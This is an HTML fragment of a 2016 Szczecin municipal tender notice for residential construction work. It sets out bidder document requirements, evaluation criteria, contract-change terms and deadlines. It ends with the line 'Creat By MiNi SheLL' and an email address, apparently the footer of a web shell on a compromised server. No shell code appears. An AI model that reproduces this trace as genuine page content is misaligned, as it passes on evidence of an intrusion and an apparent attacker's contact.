<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdej z branż oddzielnie, dla każdego lokalu mieszkalnego, sporządzone zgodnie z postanowieniami Rozdziału X siwz.
W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                               z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ust.1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie1) terminu wykonania zamówienia:
a) w przypadku wystąpienia okoliczności nieprzewidzianych i niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy, 
b) w przypadku wystąpienia okoliczności leżącej po stronie Zamawiającego, w szczególności wstrzymania robót przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej, 
c) w przypadku warunków pogodowych uniemożliwiających ze względów technologicznych prowadzenie robót - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane, 
d) w przypadku wystąpienia robót zamiennych, przez które rozumie się roboty, które nie wykraczają poza przedmiot zamówienia, wprowadzające jedynie zmiany ulepszające, zapewniające osiągniecie celu procesu budowlanego, rozwiązanie zamienne w zakresie rodzaju zastosowanych materiałów w technologii wykonywanych robót, zmiana technologii wykonania robót, a ich wystąpienie będzie miało istotny wpływ na przesunięcie terminu zakończenia robót, 
e) w przypadku wystąpienia przeszkody o obiektywnym charakterze (zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód. 
2) osób przewidzianych do realizacji umowy po stronie Wykonawcy (ujętych w wykazie zawartym w ofercie), pod warunkiem, że nowe osoby będą posiadały kwalifikacje zgodne z wymogiem opisanym w siwz. Zmiana taka będzie dopuszczalna w przypadku choroby, wypadku, śmierci lub w sytuacji, gdy osoba przewidziana do realizacji umowy, nie wywiązuje się należycie ze swoich obowiązków lub z innej niezależnej od Wykonawcy przyczyny. Zmiana osób wymaga zgody Zamawiającego, pod rygorem odstąpienia od umowy lub zapłaty kary umownej wskazanej w § 12 ust. 1 pkt 5 umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70 - 546 Szczecin
pokój nr 9
po okazaniu dowodu wpłaty na kwotę 50 zł na konto 91 1020 4795 0000 9202 0292 7580.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2016 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70 - 546 Szczecin
pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 17.	Zgodnie z art. 24 ust. 2a ustawy, Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia Wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com